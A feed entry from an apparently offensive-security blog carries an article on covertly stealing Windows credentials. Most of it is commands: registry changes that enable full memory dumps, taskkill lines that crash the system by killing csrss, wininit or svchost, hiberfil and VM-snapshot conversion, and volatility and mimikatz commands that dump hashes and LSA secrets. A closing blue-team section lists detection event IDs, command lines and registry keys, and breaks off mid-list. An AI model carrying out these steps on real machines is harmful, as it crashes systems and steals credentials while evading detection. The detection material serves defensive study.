<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>DefenseEvasion</title><subtitle>RedTeam &amp; BlueTeam notes.

For educational purposes only!!!</subtitle><author><name>DefenseEvasion</name></author><id>https://teletype.in/atom/defenseevasion</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/defenseevasion?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@defenseevasion?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=defenseevasion"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/defenseevasion?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-04-21T06:14:17.229Z</updated><entry><id>defenseevasion:get-passwords-no-one-notices</id><link rel="alternate" type="text/html" href="https://teletype.in/@defenseevasion/get-passwords-no-one-notices?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=defenseevasion"></link><title>💀 Windows | Get passwords no one notices 🔑</title><published>2024-11-04T19:11:03.732Z</published><updated>2024-11-05T12:38:07.832Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img3.teletype.in/files/e3/3f/e33f66a5-bb2c-46e2-be76-fbc2d23122c7.png"></media:thumbnail><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/12/88/1288934b-405d-492a-9279-a36496be80b6.png&quot;&gt;Demo: https://t.me/DefenseEvasion</summary><content type="html">
  &lt;p id=&quot;IGmL&quot;&gt;Demo: &lt;a href=&quot;https://t.me/DefenseEvasion/38&quot; target=&quot;_blank&quot;&gt;https://t.me/DefenseEvasion/38&lt;/a&gt;&lt;/p&gt;
  &lt;h2 id=&quot;JWW1&quot;&gt;Intro&lt;/h2&gt;
  &lt;p id=&quot;4kuU&quot;&gt;Local and domain cached credentials, tickets and so on are located on your RAM. But real-time extraction is noisy and can be easily detected.&lt;/p&gt;
  &lt;p id=&quot;M7Nf&quot;&gt;One of existing solutions is to crash target system to get full memory dump, exfiltrate the file and process it remotely to defense evasion.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;UDeV&quot;&gt;💡&lt;strong&gt; Tip:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;gf1i&quot;&gt;There are cases when you have to reboot the computer, but some servers and computers restrict system restarts. So BSoD also can help to bypass limitations.&lt;/p&gt;
  &lt;/section&gt;
  &lt;h2 id=&quot;GHVO&quot;&gt;In this article&lt;/h2&gt;
  &lt;ul id=&quot;kVlJ&quot;&gt;
    &lt;li id=&quot;PoNX&quot;&gt;&lt;a href=&quot;#3Mhh&quot;&gt;How to prepare the system to BSoD&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;SVUK&quot;&gt;&lt;a href=&quot;#vhCB&quot;&gt;How to BSoD&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;6Cj6&quot;&gt;&lt;a href=&quot;#OBlw&quot;&gt;If not BSoD, where to get passwords from?&lt;/a&gt;&lt;/li&gt;
    &lt;ul id=&quot;Xavm&quot;&gt;
      &lt;li id=&quot;kPbC&quot;&gt;&lt;a href=&quot;#GgyH&quot;&gt;Hiberfil.sys file&lt;/a&gt;&lt;/li&gt;
      &lt;li id=&quot;1nQw&quot;&gt;&lt;a href=&quot;#tp1q&quot;&gt;VM snaphots&lt;/a&gt;&lt;/li&gt;
    &lt;/ul&gt;
    &lt;li id=&quot;GjyA&quot;&gt;&lt;a href=&quot;#OveU&quot;&gt;How to extract credentials&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;3yft&quot;&gt;&lt;a href=&quot;#zym6&quot;&gt;Squeezing every last drop of RAM to gather information&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;bMnl&quot;&gt;Blue team tips&lt;/li&gt;
    &lt;ul id=&quot;iZO6&quot;&gt;
      &lt;li id=&quot;hVpU&quot;&gt;&lt;a href=&quot;#sZqU&quot;&gt;Detection&lt;/a&gt;&lt;/li&gt;
      &lt;li id=&quot;uBYw&quot;&gt;&lt;a href=&quot;#WMfx&quot;&gt;Hardening&lt;/a&gt;&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;29l0&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;3Mhh&quot;&gt;Before we BSoD&lt;/h2&gt;
  &lt;h3 id=&quot;lqaU&quot;&gt;0. Check if there is enough disk space to memory dump&lt;/h3&gt;
  &lt;p id=&quot;MjPT&quot;&gt;Full memory dump occupies as much disk space as RAM stores. If disk space is too low, this technique will not work&lt;/p&gt;
  &lt;h3 id=&quot;VWhy&quot;&gt;1. Make sure complete memory dump enabled&lt;/h3&gt;
  &lt;pre id=&quot;fvMk&quot;&gt;(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled).CrashDumpEnabled -eq 1&lt;/pre&gt;
  &lt;h3 id=&quot;kZBT&quot;&gt;1*. Enable if necessary&lt;/h3&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;FUzt&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;9CNk&quot;&gt;Admin rights required&lt;/p&gt;
  &lt;/section&gt;
  &lt;ul id=&quot;RfDn&quot;&gt;
    &lt;li id=&quot;N28t&quot;&gt;GUI (System properties --&amp;gt; Advanced system settings --&amp;gt; Advanced --&amp;gt; Startup and Recovery --&amp;gt; Settings)&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;dw6Z&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/bb/e1/bbe1d245-3514-4569-9266-2766ce7a4f0d.jpeg&quot; width=&quot;473&quot; /&gt;
  &lt;/figure&gt;
  &lt;ul id=&quot;BJJh&quot;&gt;
    &lt;li id=&quot;O6ad&quot;&gt;cmd.exe&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;3ii0&quot;&gt;reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f&lt;/pre&gt;
  &lt;ul id=&quot;ifLb&quot;&gt;
    &lt;li id=&quot;Rz7y&quot;&gt;PowerShell&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;MsTe&quot;&gt;Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord&lt;/pre&gt;
  &lt;ul id=&quot;Ps6b&quot;&gt;
    &lt;li id=&quot;fj3a&quot;&gt;Registry Editor (regedit.exe)&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;4v0j&quot; class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/37/b9/37b9fee4-c335-40da-8c02-797e2fd39197.jpeg&quot; width=&quot;537&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;Ryhs&quot;&gt;2. Make sure MEMORY.DMP file can be created&lt;/h3&gt;
  &lt;pre id=&quot;y5HG&quot;&gt;(Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl -Name Overwrite).Overwrite -eq 1&lt;/pre&gt;
  &lt;h3 id=&quot;jhsi&quot;&gt;2*. Allow if necessary&lt;/h3&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;qqnP&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;4AdW&quot;&gt;Admin rights required&lt;/p&gt;
  &lt;/section&gt;
  &lt;ul id=&quot;P6JM&quot;&gt;
    &lt;li id=&quot;rgpa&quot;&gt;cmd.exe&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;srcX&quot;&gt;reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v Overwrite /d 1 /f&lt;/pre&gt;
  &lt;ul id=&quot;Z7Cw&quot;&gt;
    &lt;li id=&quot;23Ze&quot;&gt;PowerShell&lt;/li&gt;
  &lt;/ul&gt;
  &lt;pre id=&quot;55wu&quot;&gt;Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name Overwrite -Value 1 -Type DWord&lt;/pre&gt;
  &lt;ul id=&quot;YywH&quot;&gt;
    &lt;li id=&quot;FQwU&quot;&gt;Registry Editor (regedit.exe)&lt;/li&gt;
  &lt;/ul&gt;
  &lt;figure id=&quot;evlm&quot; class=&quot;m_retina&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c2/5b/c25b0999-1b6d-4277-a965-cd02a8ed3890.jpeg&quot; width=&quot;533&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;Za7R&quot;&gt;3. Make sure pagefile.sys size is enough&lt;/h3&gt;
  &lt;p id=&quot;74tW&quot;&gt;For Complete memory dump %SystemDrive%\pagefile.sys must be &amp;gt;= &lt;a href=&quot;https://learn.microsoft.com/en-us/troubleshoot/windows-client/performance/how-to-determine-the-appropriate-page-file-size-for-64-bit-versions-of-windows&quot; target=&quot;_blank&quot;&gt;RAM size + 257 MB&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;UllI&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;vhCB&quot;&gt;How to BSoD&lt;/h2&gt;
  &lt;h3 id=&quot;OTk4&quot;&gt;1. Terminate a critical process&lt;/h3&gt;
  &lt;ul id=&quot;rvF3&quot;&gt;
    &lt;li id=&quot;3MZw&quot;&gt;&lt;strong&gt;Windows 7:&lt;/strong&gt; csrss.exe&lt;/li&gt;
    &lt;li id=&quot;BFv6&quot;&gt;&lt;strong&gt;Windows 7, 8:&lt;/strong&gt; wininit.exe&lt;/li&gt;
    &lt;li id=&quot;7jHL&quot;&gt;&lt;strong&gt;Windows 10, 11: &lt;/strong&gt;svchost.exe&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;7bmS&quot;&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;SAKZ&quot;&gt;taskkill /im csrss.exe /f
taskkill /im wininit.exe /f
taskkill /im svchost.exe /f&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;Pkgg&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;DW4C&quot;&gt;Admin rights required&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;g7O6&quot;&gt;2. Start a critical process&lt;/h3&gt;
  &lt;ul id=&quot;QzvL&quot;&gt;
    &lt;li id=&quot;dUhc&quot;&gt;wininit.exe&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;OBOo&quot;&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;7uQ4&quot;&gt;wininit&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;q9Kj&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;Ttoi&quot;&gt;This bug &lt;a href=&quot;https://www.reddit.com/r/windows/comments/11zi7db/wininit_bsod_command_does_not_work_in_windows_11/&quot; target=&quot;_blank&quot;&gt;was fixed&lt;/a&gt; on Windows 11 Admin rights required&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;cuRH&quot;&gt;3. Start and kill your own critical process&lt;/h3&gt;
  &lt;p id=&quot;34ZS&quot;&gt;C# implementation: &lt;a href=&quot;https://github.com/GrumpBoat/ForceBSOD&quot; target=&quot;_blank&quot;&gt;https://github.com/GrumpBoat/ForceBSOD&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;6vnI&quot;&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;2qaZ&quot;&gt;ForceBSOD.exe&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;z5MX&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;DSVy&quot;&gt;Admin rights required&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;PiMn&quot;&gt;4. Ask a driver to cause problems&lt;/h3&gt;
  &lt;p id=&quot;lsl4&quot;&gt;The &lt;a href=&quot;https://github.com/lhb5883/LabVIEW/blob/master/Notmyfault/exe/notmyfault.c&quot; target=&quot;_blank&quot;&gt;custom driver&lt;/a&gt; can be used to generate BSoD. For example, NotMyFault from Sysinternals package works this way.&lt;/p&gt;
  &lt;p id=&quot;Ksuc&quot;&gt;Sysinternals implementation: &lt;a href=&quot;https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault&quot; target=&quot;_blank&quot;&gt;https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault&lt;/a&gt;&lt;/p&gt;
  &lt;p id=&quot;WXtk&quot;&gt;Supports both GUI and CLI and several ways to crash the system.&lt;/p&gt;
  &lt;p id=&quot;Ugpf&quot;&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;wLlw&quot;&gt;notmyfault.exe /crash&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;DWT4&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;qfjl&quot;&gt;Admin rights required&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;hNWF&quot;&gt;5*. CrashOnCtrlScroll&lt;/h3&gt;
  &lt;p id=&quot;f7Bg&quot;&gt;Set registry values depending on your keyboard. Create REG_DWORD &lt;a href=&quot;https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/forcing-a-system-crash-from-the-keyboard&quot; target=&quot;_blank&quot;&gt;CrashOnCtrlScroll&lt;/a&gt; and set 0x1 value under:&lt;/p&gt;
  &lt;ul id=&quot;2AKr&quot;&gt;
    &lt;li id=&quot;PI8j&quot;&gt;&lt;strong&gt;PS/2&lt;/strong&gt;: HKLM\System\CurrentControlSet\Services\i8042prt\Parameters&lt;/li&gt;
    &lt;li id=&quot;dVaM&quot;&gt;&lt;strong&gt;USB&lt;/strong&gt;: HKLM\System\CurrentControlSet\Services\kbdhid\Parameters&lt;/li&gt;
    &lt;li id=&quot;owdd&quot;&gt;&lt;strong&gt;Hyper-V&lt;/strong&gt;: HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;3hU8&quot;&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;PNcj&quot;&gt;Press and hold the Rightmost Ctrl and then press Scroll Lock twice&lt;/pre&gt;
  &lt;section style=&quot;background-color:hsl(hsl(34,  84%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;N1Bk&quot;&gt;⚠️ &lt;strong&gt;Warning:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;vBna&quot;&gt;Physical access or VM management console access required!&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;YjNF&quot;&gt;6*. Raise a NtRaiseHardError&lt;/h3&gt;
  &lt;p id=&quot;YI2P&quot;&gt;Tools:&lt;/p&gt;
  &lt;ul id=&quot;SkbO&quot;&gt;
    &lt;li id=&quot;8u6p&quot;&gt;&lt;a href=&quot;https://github.com/peewpw/Invoke-BSOD/tree/master&quot; target=&quot;_blank&quot;&gt;https://github.com/peewpw/Invoke-BSOD/tree/master&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;M1dL&quot;&gt;&lt;a href=&quot;https://github.com/u0932478239/no-admin-bsod&quot; target=&quot;_blank&quot;&gt;https://github.com/u0932478239/no-admin-bsod&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;Cck3&quot;&gt;&lt;a href=&quot;https://github.com/blueskychan-dev/FuckedUP&quot; target=&quot;_blank&quot;&gt;https://github.com/blueskychan-dev/FuckedUP&lt;/a&gt;&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;iQBT&quot;&gt;🔥 &lt;strong&gt;Pros:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;fRr2&quot;&gt;No admin needed&lt;/p&gt;
  &lt;/section&gt;
  &lt;section style=&quot;background-color:hsl(hsl(323, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;AthG&quot;&gt;❌ &lt;strong&gt;Error:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;EecX&quot;&gt;Failed to extract passwords from MEMORY.DMP file which was created using this technique during tests&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;hogU&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;OBlw&quot;&gt;What else if not RAM?&lt;/h2&gt;
  &lt;h3 id=&quot;GgyH&quot;&gt;1. Hiberfil.sys&lt;/h3&gt;
  &lt;p id=&quot;Q6Yb&quot;&gt;&lt;strong&gt;Path&lt;/strong&gt;: %SystemDrive%\hiberfil.sys&lt;/p&gt;
  &lt;p id=&quot;qS4Q&quot;&gt;It stores compressed RAM before the system go to sleep / hibernation state. So you need to decompress it first.&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;Q8AI&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;K6v1&quot;&gt;Convert it to .dmp formats with one of these tools:&lt;/p&gt;
    &lt;ul id=&quot;vs5J&quot;&gt;
      &lt;li id=&quot;Pv7m&quot;&gt;&lt;a href=&quot;https://github.com/MagnetForensics/Hibr2Bin&quot; target=&quot;_blank&quot;&gt;Hibr2Bin&lt;/a&gt; + &lt;a href=&quot;https://github.com/MagnetForensics/Bin2Dmp&quot; target=&quot;_blank&quot;&gt;Bin2Dmp&lt;/a&gt;&lt;/li&gt;
      &lt;li id=&quot;vHTW&quot;&gt;&lt;a href=&quot;https://github.com/Crypt2Shell/Comae-Toolkit&quot; target=&quot;_blank&quot;&gt;Hibr2Dmp (Comae Toolkit)&lt;/a&gt; or &lt;a href=&quot;https://github.com/arizvisa/windows-binary-tools&quot; target=&quot;_blank&quot;&gt;Hibr2Dmp (Windows Binary Tools)&lt;/a&gt;&lt;/li&gt;
    &lt;/ul&gt;
    &lt;pre id=&quot;5dGu&quot;&gt;Hibr2Dmp.exe D:\Dumps\hiberfil.sys D:\Dumps\hiberfil.dmp&lt;/pre&gt;
    &lt;ul id=&quot;6DQV&quot;&gt;
      &lt;li id=&quot;cyne&quot;&gt;&lt;a href=&quot;https://github.com/volatilityfoundation/volatility&quot; target=&quot;_blank&quot;&gt;volatility2&lt;/a&gt;&lt;/li&gt;
    &lt;/ul&gt;
    &lt;pre id=&quot;yblt&quot;&gt;py vol.py -f D:\Dumps\hiberfil.sys imageinfo
py vol.py -f D:\Dumps\hiberfil.sys imagecopy --profile=&amp;lt;your_profile&amp;gt; -O D:\Dumps\hiberfil.raw
py vol.py -f D:\Dumps\hiberfil.raw --profile=&amp;lt;your_profile&amp;gt; raw2dmp -O D:\Dumps\hiberfil.dmp&lt;/pre&gt;
    &lt;p id=&quot;aydz&quot;&gt;*MoonSols Memory Toolkit is no longer officially distributed&lt;/p&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;tp1q&quot;&gt;2. Virtual Machine snaphot&lt;/h3&gt;
  &lt;section style=&quot;background-color:hsl(hsl(55,  86%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;rlNJ&quot;&gt;⚠️ &lt;strong&gt;Note:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;aV5H&quot;&gt;Convert it to .dmp formats first following the general approach:&lt;/p&gt;
    &lt;ol id=&quot;7cUO&quot;&gt;
      &lt;li id=&quot;Rlto&quot;&gt;Convert a snapshot to a raw file&lt;/li&gt;
      &lt;li id=&quot;0ClG&quot;&gt;Convert a raw file to a .dmp file&lt;/li&gt;
    &lt;/ol&gt;
    &lt;p id=&quot;vQuo&quot;&gt;VmWare has &lt;a href=&quot;https://archive.org/download/flings.vmware.com/Flings/Vmss2core/&quot; target=&quot;_blank&quot;&gt;vmss2core&lt;/a&gt; (Built-in tool for VmWare Workstation)&lt;/p&gt;
    &lt;pre id=&quot;c0dt&quot;&gt;vmss2core.exe -W D:\Dumps\snapshot.vmsn D:\Dumps\snapshot.vmem    &lt;/pre&gt;
  &lt;/section&gt;
  &lt;p id=&quot;U66c&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;OveU&quot;&gt;How to extract credentials&lt;/h2&gt;
  &lt;h3 id=&quot;R5Cj&quot;&gt;&lt;a href=&quot;https://book.jorianwoltjer.com/forensics/memory-dumps-volatility&quot; target=&quot;_blank&quot;&gt;volatility3&lt;/a&gt;&lt;/h3&gt;
  &lt;pre id=&quot;KtLv&quot;&gt;py vol.py -f MEMORY.DMP windows.cachedump.Cachedump
py vol.py -f MEMORY.DMP windows.hashdump.Hashdump
py vol.py -f MEMORY.DMP windows.lsadump.Lsadump&lt;/pre&gt;
  &lt;h3 id=&quot;ZlDD&quot;&gt;&lt;a href=&quot;https://woshub.com/how-to-get-plain-text-passwords-of-windows-users/&quot; target=&quot;_blank&quot;&gt;WinDbg + mimilib.dll&lt;/a&gt;&lt;/h3&gt;
  &lt;ol id=&quot;5xLz&quot;&gt;
    &lt;li id=&quot;s4cx&quot;&gt;Load a crash dump&lt;/li&gt;
    &lt;li id=&quot;ksip&quot;&gt;Load mimilib.dll using commands listed below&lt;/li&gt;
  &lt;/ol&gt;
  &lt;pre id=&quot;wRDn&quot;&gt;.load D:\Tools\mimilib.dll
!process 0 0 lsass.exe
.process /r /p &amp;lt;NUMBER_FROM_PREVIOUS_STEP&amp;gt;
!mimikatz    &lt;/pre&gt;
  &lt;h3 id=&quot;oMgP&quot;&gt;&lt;a href=&quot;https://github.com/google/rekall/blob/master/rekall-core/rekall/plugins/windows/mimikatz.py&quot; target=&quot;_blank&quot;&gt;rekall&lt;/a&gt; + mimikatz plugin&lt;/h3&gt;
  &lt;p id=&quot;VIaq&quot;&gt;Outdated and not recommended to use&lt;/p&gt;
  &lt;p id=&quot;K2DG&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;zym6&quot;&gt;🎁 Bonus&lt;/h2&gt;
  &lt;p id=&quot;Qg9M&quot;&gt;RAM also contains a lot of useful information:&lt;/p&gt;
  &lt;ul id=&quot;PMyJ&quot;&gt;
    &lt;li id=&quot;S8DN&quot;&gt;&lt;a href=&quot;https://www.cyberark.com/resources/threat-research-blog/extracting-clear-text-credentials-directly-from-chromium-s-memory&quot; target=&quot;_blank&quot;&gt;browsers&amp;#x27; data&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;djBZ&quot;&gt;&lt;a href=&quot;https://www.reddit.com/r/ProtonPass/comments/14uva6i/found_all_passwords_urls_and_usernames_in_memory/&quot; target=&quot;_blank&quot;&gt;password managers&amp;#x27; data&lt;/a&gt;&lt;/li&gt;
    &lt;li id=&quot;az24&quot;&gt;registry&lt;/li&gt;
    &lt;li id=&quot;pCH1&quot;&gt;all running processes&lt;/li&gt;
  &lt;/ul&gt;
  &lt;section style=&quot;background-color:hsl(hsl(170, 33%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;VO0l&quot;&gt;💡&lt;strong&gt; Tip:&lt;/strong&gt;&lt;/p&gt;
    &lt;p id=&quot;uaAZ&quot;&gt;Search for vulnerable services (unquoted service path, for example) or recon software installed&lt;/p&gt;
  &lt;/section&gt;
  &lt;p id=&quot;7lG7&quot;&gt;&lt;/p&gt;
  &lt;h2 id=&quot;sZqU&quot;&gt;🔵 Detection&lt;/h2&gt;
  &lt;h3 id=&quot;BRH4&quot;&gt;1. Security EventID 4688, Sysmon EventID 1, PowerShell/Operational EventID 4104&lt;/h3&gt;
  &lt;p id=&quot;IHj8&quot;&gt;&lt;strong&gt;1.1. Process Command Line&lt;/strong&gt;&lt;/p&gt;
  &lt;pre id=&quot;7fDN&quot;&gt;wmic recoveros set WriteToSystemLog = False
wmic recoveros set DebugInfoType = 1
wmic recoveros set DebugFilePath = &amp;lt;path&amp;gt;
wmic recoveros set OverwriteExistingDebugFile = 1
reg add HKLM\SYSTEM\CurrentControlSet\Control\CrashControl /t REG_DWORD /v CrashDumpEnabled /d 1 /f
Set-ItemProperty HKLM:\System\CurrentControlSet\Control\CrashControl -Name CrashDumpEnabled -Value 1 -Type DWord
taskkill /im &amp;lt;critical_process_name&amp;gt;
Stop-Process &amp;lt;critical_process_name&amp;gt;&lt;/pre&gt;
  &lt;h3 id=&quot;Crvv&quot;&gt;2. Sysmon EventID 13&lt;/h3&gt;
  &lt;p id=&quot;Ie1b&quot;&gt;&lt;strong&gt;2.1. Suspicious params of the memory crash dump&lt;/strong&gt;&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;1Wps&quot;&gt;&lt;strong&gt;Key&lt;/strong&gt;: HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\&lt;/p&gt;
    &lt;p id=&quot;I7O2&quot;&gt;&lt;strong&gt;Params&lt;/strong&gt;:&lt;/p&gt;
    &lt;ul id=&quot;J5ZS&quot;&gt;
      &lt;li id=&quot;UuAl&quot;&gt;CrashDumpEnabled = DWORD (0x00000001)&lt;/li&gt;
      &lt;li id=&quot;MFZ4&quot;&gt;Overwrite = DWORD (0x00000001)&lt;/li&gt;
      &lt;li id=&quot;quLp&quot;&gt;LogEvent = DWORD (0x00000000)&lt;/li&gt;
      &lt;li id=&quot;ykit&quot;&gt;DumpFile != %SystemRoot%\MEMORY.DMP&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/section&gt;
  &lt;p id=&quot;pfNz&quot;&gt;&lt;strong&gt;2.2. NotMyFault&lt;/strong&gt;&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;Eivo&quot;&gt;&lt;strong&gt;Key&lt;/strong&gt;: HKLM\SYSTEM\CurrentControlSet\Services\MYFAULT&lt;/p&gt;
    &lt;p id=&quot;WGcU&quot;&gt;&lt;strong&gt;Params&lt;/strong&gt;:&lt;/p&gt;
    &lt;ul id=&quot;bm6V&quot;&gt;
      &lt;li id=&quot;VzTM&quot;&gt;ImagePath = \??\C:\Windows\system32\drivers\myfault.sys&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/section&gt;
  &lt;p id=&quot;rgA8&quot;&gt;&lt;strong&gt;2.3. CrashOnCtrlScroll&lt;/strong&gt;&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;7DI3&quot;&gt;&lt;strong&gt;Key:&lt;/strong&gt;&lt;/p&gt;
    &lt;ul id=&quot;DRp4&quot;&gt;
      &lt;li id=&quot;tw0v&quot;&gt;HKLM\System\CurrentControlSet\Services\i8042prt\Parameters&lt;/li&gt;
      &lt;li id=&quot;b0FY&quot;&gt;HKLM\System\CurrentControlSet\Services\kbdhid\Parameters&lt;/li&gt;
      &lt;li id=&quot;obzS&quot;&gt;HKLM\System\CurrentControlSet\Services\hyperkbd\Parameters&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p id=&quot;Iuzc&quot;&gt;&lt;strong&gt;Params:&lt;/strong&gt;&lt;/p&gt;
    &lt;ul id=&quot;4iC3&quot;&gt;
      &lt;li id=&quot;HK35&quot;&gt;CrashOnCtrlScroll = DWORD (0x00000001)&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/section&gt;
  &lt;h3 id=&quot;oFnD&quot;&gt;3. Security EventID 4697, System EventID 7045&lt;/h3&gt;
  &lt;p id=&quot;rQoU&quot;&gt;&lt;strong&gt;3.1. NotMyFault&lt;/strong&gt;&lt;/p&gt;
  &lt;section style=&quot;background-color:hsl(hsl(199, 50%, var(--autocolor-background-lightness, 95%)), 85%, 85%);&quot;&gt;
    &lt;p id=&quot;ckkr&quot;&gt;&lt;strong&gt;Service Name&lt;/strong&gt;: MYFAULT&lt;/p&gt;
    &lt;p id=&quot;9Ut8&quot;&gt;&lt;strong&gt;Service File Name:&lt;/strong&gt; %SystemRoot%\system32\drivers\myfault.sys&lt;/p&gt;
